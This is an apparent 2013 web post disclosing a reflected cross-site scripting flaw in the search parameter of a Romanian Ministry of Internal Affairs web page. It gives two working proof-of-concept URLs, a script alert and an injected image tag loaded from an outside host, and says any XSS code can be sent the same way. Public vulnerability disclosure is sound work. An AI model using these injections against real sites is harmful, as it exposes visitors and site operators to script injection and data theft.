This site uses cookies. In order to read how we handle cookies please click here. Click on this message to accept and hide.
Go to top
35.173.48.18.US.SSL

Ministry of Internal Affairs of Romania - XSS

Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=

PoC:

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E

Code
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11

You can either include any XSS code in search input box, or request any XSS code directly using GET method and searWords parameter.

XSS#1
XSS#2


Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by Neo on 2013-12-11 01:12 0 likes

Comments

There are no comments for this news article, you can leave one here.